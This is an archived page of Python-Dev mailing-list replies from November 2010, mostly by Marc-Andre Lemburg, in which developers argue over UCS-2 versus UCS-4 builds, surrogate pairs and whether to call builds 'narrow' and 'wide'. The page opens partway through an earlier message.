runtime:

It is by far more important to maintain round-trip safety for
Unicode data, than getting every bit of code work correctly
with surrogates (often, there won't be a single correct way).

With a new method for fast detection of surrogates, we could
protect code which obviously 

Re: [Python-Dev] len(chr(i)) = 2?

2010-11-24 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 To conclude, I feel that rather than trying to fully support non-BMP
 characters as surrogate pairs in narrow builds, we should make it
 easier for application developers to avoid them. 

I don't understand what you're after here. Programmers can easily
avoid them by not using them :-)

 If abandoning
 internal use of UTF-16 is not an option, I think we should at least
 add an option for decoders that currently produce surrogate pairs to
 treat non-BMP characters as errors and handle them according to user's
 choice.

But what do you gain by doing this ? You'd lose the round-trip
safety of those codecs and that's not a good thing.

Note that most text processing APIs in Python work based on code
units, which in most cases represent single code points, but in
some cases can also represent surrogates (both on UCS-2 and on
UCS-4 builds).

E.g. str.center(n) centers the string in a padded string that
is composed of n code units. Whether that operation will result
in a text that's centered visually on output is a completely
different story. The original string could contain surrogates,
it could also contain combing code points, so the visual
presentation of the result may very well not be centered at
all; it may not even appear as having the length n to the user.

Since we're not going change the semantics of those APIs,
it is OK to not support padding with non-BMP code points on
UCS-2 builds.

Supporting such cases would only cause problems:

* if the methods would pad with surrogates, the resulting
  string would no longer have length n; breaking the
  assumption that len(str.center(n)) == n

* if the methods would pad with half the number of surroagtes
  to make sure that len(str.center(n)) == n, the resulting
  output to e.g. a terminal would be further off, than what
  you already have with surrogates and combining code points
  in the original string.

More on codecs supporting surrogates:

  http://mail.python.org/pipermail/python-dev/2008-July/080915.html

Perhaps it's time to reconsider a project I once started
but that never got off the ground:

  http://mail.python.org/pipermail/python-dev/2008-July/080911.html

Here's the pre-PEP:

  http://mail.python.org/pipermail/python-dev/2001-July/015938.html

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 24 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] len(chr(i)) = 2?

2010-11-23 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Mon, Nov 22, 2010 at 1:13 PM, Raymond Hettinger
 raymond.hettin...@gmail.com wrote:
 ..
 Any explanation we give users needs to let them know two things:
 * that we cover the entire range of unicode not just BMP
 * that sometimes len(chr(i)) is one and sometimes two
 
 This discussion motivated me to start looking into how well Python
 library itself is prepared to deal with len(chr(i)) = 2.  I was not
 surprised to find that textwrap does not handle the issue that well:
 
 len(wrap(' \U00010140' * 80, 20))
 12
 len(wrap(' \U0140' * 80, 20))
 8
 
 That module should probably be rewritten to properly implement  the
 Unicode line breaking algorithm
 http://unicode.org/reports/tr14/tr14-22.html.
 
 Yet finding a bug in a str object method after a 5 min review was a
 bit discouraging:
 
 'xyz'.center(20, '\U00010140')
 Traceback (most recent call last):
   File stdin, line 1, in module
 TypeError: The fill character must be exactly one character long
 
 Given the apparent difficulty of writing even basic text processing
 algorithms in presence of surrogate pairs, I wonder how wise it is to
 expose Python users to them. 

What's the alternative ?

Without surrogates, Python users with UCS-2 build (e.g. the Windows
Python users) would not be allowed to play with non-BMP code points.

IMHO, it's better to fix the stdlib. This is a long process, as you
can see with the Python3 stdlib evolution, but Python will eventually
get there.

 As Wikipedia explains, [1]
 
 
 Because the most commonly used characters are all in the Basic
 Multilingual Plane, converting between surrogate pairs and the
 original values is often not tested thoroughly. This leads to
 persistent bugs, and potential security holes, even in popular and
 well-reviewed application software.
 
 
 Since UCS-2 (the Character Encoding Form (CEF)) is now defined [1] to
 cover only BMP, maybe rather than changing the terms used in the
 reference manual, we should tighten the code to conform to the updated
 standards?

Can we please stop turning this around over and over again :-)
UCS-2 has never supported anything other than the BMP. However,
you can interpret sequences of UCS-2 code unit as UTF-16 and
then get access to the full Unicode character set. We've been
doing this in codecs ever since UCS-4 builds were introduced
some 8-9 years ago.

The change to have chr(i) return surrogates on UCS-2 builds
was perhaps done too early, but then, without such changes you'd
never notice that your code doesn't work well with surrogates.
It's just one piece of the puzzle when going from 8-bit strings
to Unicode.

 Again, given that the str object itself has at least one non-BMP
 character bug as we are closing on the third major release of py3k,
 how likely are 3rd party developers to get their libraries right as
 they port to 3.x?
 
 [1] http://en.wikipedia.org/wiki/UTF-16/UCS-2
 [2] http://unicode.org/reports/tr17/#CharacterEncodingForm

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 23 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] len(chr(i)) = 2?

2010-11-22 Thread M.-A. Lemburg
Martin,

it is really irrelevant whether the standards have decided
to no longer use the terms UCS-2 and UCS-4 in their latest
standard documents.

The definitions still stand (just like Unicode 2.0 is still a valid
standard, even if it's ten years old):

* UCS-2 is defined as Universal Character Set coded in 2 octets
by ISO 10464: (see http://www.unicode.org/versions/Unicode5.2.0/appC.pdf)

* UCS-4 is defined as Universal Character Set coded in 4 octets
by ISO 10464.

Those two terms have been in use for many years. They refer to
the Unicode character set as it can be represented in 2 or 4
bytes. As such they don't include any of the special meanings
associated with the UTF transfer encodings. There are no invalid
sequences, no invalid code points, etc. as you can find in the UTF
encodings. And that's an important detail.

If you interpret them as encodings, they are 1-1 mappings of
Unicode code point ordinals to integers represented using
2 or 4 bytes.

UCS-2 only supports BMP code points and can conveniently
be interpreted as UTF-16, if you need to encode non-BMP
code points (which we do in the UTF codecs).

UCS-4 also supports non-BMP code points directly.

Now, from a ISO or Unicode Consortium point of view, deprecating
the term UCS-2 in *their* standard papers is only natural, since
they are actively starting to assign non-BMP code points which
cannot be represented in UCS-2.

However, this deprecation is only relevant for the purpose of defining
the standard. The above definitions are still useful
when it comes to defining code units, i.e. the used storage format,
(as opposed to the transfer format).

For the purpose of describing the code units we are using in Python
they are (still) the most correct terms and that's also the reason
why we chose to use them when introducing the configure options
in Python2.

There are no other accurate definitions we could use. The terms
narrow and wide are simply too inaccurate to be used as
description of UCS-2 and UCS-4 code units.

Please also note that we have used the terms UCS-2 and UCS-4 in Python2
for 9+ years now and users are just starting to learn the difference
and get acquainted with the fact that Python uses these two forms.

Confronting them with narrow and wide builds is only
going to cause more confusion, not less, and adding those
strings to Python package files isn't going to help much either,
since the terms don't convey any relationship to Unicode:

package-3.1.3.linux-x86_64-py2.6_ucs2.egg
vs.
package-3.1.3.linux-x86_64-py2.6_narrow.egg

I opt for switching to the following config options:

--with-unicode=ucs2 (default)
--with-unicode=ucs4

and using UCS-2 and UCS-4 in the Python documentation when
describing the two different build modes.  We can add glossary
entries for the two which clarify the differences.

Python2 used --enable-unicode=ucs2/ucs4, but since Python3 doesn't
build without Unicode support, the above two versions appear more
appropriate.

We can keep the alternative --with-wide-unicode as an alias
for --with-unicode=ucs4 to maintain 3.x backwards compatibility.

Cheers,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 22 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/


Martin v. Löwis wrote:
 Am 22.11.2010 11:48, schrieb Stephen J. Turnbull:
 Raymond Hettinger writes:

   Neither UTF-16 nor UCS-2 is exactly correct anyway.

 From a standards lawyer point of view, UCS-2 is exactly correct, as
 far as I can tell upon rereading ISO 10646-1, especially Annexes H
 (retransmitting devices) and Q (UTF-16).  Annex Q makes it clear
 that UTF-16 was intentionally designed so that Python-style processing
 could be done in a UCS-2 context.
 
 I could only find the FCD of 10646:2010, where annex H was integrated
 into section 10:
 
 http://www.itscj.ipsj.or.jp/sc2/open/02n4125/FCD10646-Main.pdf
 
 There they have stopped using the term UCS-2, and added a note
 
 # NOTE – Former editions of this standard included references to a
 # two-octet BMP form called UCS-2 which would be a subset
 # of the UTF-16 encoding form restricted to the BMP UCS scalar values. #
 The UCS-2 form is deprecated.
 
 I think they are now acknowledging that UCS-2 was a misleading term,
 making it ambiguous whether this refers to a CCS, a CEF, or a CES;
 like ASCII, people have been using it for all three of them.
 
 Apparently, the ISO WG interprets earlier 

Re: [Python-Dev] len(chr(i)) = 2?

2010-11-22 Thread M.-A. Lemburg
Raymond Hettinger wrote:
 Any explanation we give users needs to let them know two things:
 * that we cover the entire range of unicode not just BMP
 * that sometimes len(chr(i)) is one and sometimes two
 
 The term UCS-2 is a complete communications failure
 in that regard.  If someone looks up the term, they will
 immediately see something like the wikipedia entry which says,
 UCS-2 cannot represent code points outside the BMP.
 How is that helpful?

It's very helpful, since it explains why a UCS-2 build of Python
requires a surrogates pair to represent a non-BMP code point
and explains why chr(i) gives you a length 2 string rather than
a length 1 string.

A UCS-4 build does not need to use surrogates for this, hence
you get a length 1 string from chr(i).

There are two levels we have to explain to users:

1. the transfer level

2. the storage level

The UTF encodings address the transfer level and is what
you deal with in I/O. These provide variable length encodings of
the complete Unicode code point range, regardless of whether
you have a UCS-2 or a UCS-4 build.

The storage level becomes important if you want to work on
strings using indexing and slicing. Here you do have to know
whether you're dealing with a UCS-2 or a UCS-4 build, since the
indexes will vary if you're using non-BMP code points.

Finally, to tie both together, we have to explain that UTF-16
(the transfer encoding) maps to UCS-2 in a straight-forward way,
so it is possible to work with a UCS-2 build of Python and still
use the complete Unicode code point range - you only have to
take into consideration, that Python's string indexing will not
necessarily point you to n-th code point in a string, but may
well give you half or a surrogate.

Note that while that last aspect may appear like a good argument
for UCS-4 builds, in reality it is not. UCS-4 has the same
issue on a different level: the letters that get printed on
the screen or printer (graphemes) may well be made up of
multiple combining code points, e.g. an e and an ´.
Those again map to two indexes in the Python string, even
though, the appear to be one character on output.

Now try to explain all of the above using the terms narrow
and wide (while remembering explicit is better than implicit
and avoid the temptation to guess) :-)

It is not really helpful to replace a correct and accurate
term with a fuzzy term: either way we're stuck with the
semantics.

However, the correct and accurate terms at least give
you a chance to figure out and understand the reasoning
behind the design. UCS-2 vs. UCS-4 is a trade-off, narrow
and wide is marketing talk with an implicit emphasis on
one side :-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 22 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] len(chr(i)) = 2?

2010-11-19 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 On Friday 19 November 2010 17:53:58 Alexander Belopolsky wrote:
 I was recently surprised to learn that chr(i) can produce a string of
 length 2 in python 3.x.
 
 Yes, but only on narrow build. Eg. Debian and Ubuntu compile Python 3.1 in 
 wide mode (sys.maxunicode == 1114111).
 
 I suspect that I am not alone finding this behavior non-obvious 
 given that a mistake in Python manual stating the contrary survived 
 several releases.  [1]
 
 It was a documentation bug and you fixed it. Non-BMP characters are rare, so 
 few (maybe only you?) noticed the documentation bug. I consider the behaviour 
 as an improvment of non-BMP support of Python3.
 
 Python is unclear about non-BMP characters: narrow build was called ucs2 
 for 
 long time, even if it is UTF-16 (each character is encoded to one or two 
 UTF-16 words).

No, no, no :-)

UCS2 and UCS4 are more appropriate than narrow and wide or even
UTF-16 and UTF-32.

It'S rather common to confuse a transfer encoding with a storage format.
UCS2 and UCS4 refer to code units (the storage format). You can use
UCS2 and UCS4 code units to represent UTF-16 and UTF-32 resp., but those
are not the same things.

In UTF-16 0xD800 has a special meaning, in UCS2 it doesn't.
Python uses UCS2 internally. It does not assign a special meaning
to those surrogate code point ranges.

However, when it comes to codecs, we do try to make use of the fact
that UCS2 can easily be used to represent an UTF-16 encoding and
that's why you often see surrogates being created for code points
that wouldn't otherwise fit into UCS2 and you see those surrogates
being converted back to single code units in UCS4 builds.

I don't know who invented the terms narrow and wide builds
for Python3. Not me that's for sure :-) They don't have any
meaning in Unicode terminology and thus cause even more confusion
than UCS2 and UCS4. E.g. the import errors you
get when importing extensions built for a different Unicode
version, (correctly) refer to UCS2 vs. UCS4 and now give even less
of a clue that they relate to difference in Unicode builds (since
these are now labeled narrow and wide).

IMO, we should go back to the Python2 terms UCS2 and UCS4 which
are correct and provide a clear description of what Python uses
internally for code units.

 Python2 accepts non-BMP characters with \U syntax, but not with 
 chr(). This is inconsistent and I see this as a bug. But I don't want to 
 touch 
 Python2 about non-BMP characters, and the bug is already fixed in Python3!
 
 I do believe, however that a change like
 this [2] and its consequences should be better publicized.
 
 Change made before the release of Python 3.0. Do you want to patch the 
 What's 
 new in Python 3.0? document?

Perhaps add a section What we forgot to mention in 3.0 or
What's not so new in 3.2 to What's new in 3.2 :-)

 I have not
 found any discussion of this change in PEPs or What's new documents.
  The closest find was a mentioning of a related issue #3280 in the 3.0
 NEWS file. [3]  Since this feature will be first documented in the
 Library Reference in 3.2, I wonder if it will be appropriate to
 mention it in What's new in 3.2?
 
 In my opinion, the question is more what was it not fixed in Python2. I 
 suppose 
 that the answer is something ugly like backward compatibility or 
 historical 
 reasons :-)

Backwards compatibility.

Python2 applications don't expect unichr(i)
to return anything other than a single character. If you need this
in Python2, it's easy enough to get around, though, with a little
helper function.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 19 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


<    1   2   3   4   5   6   7   8   9   10   >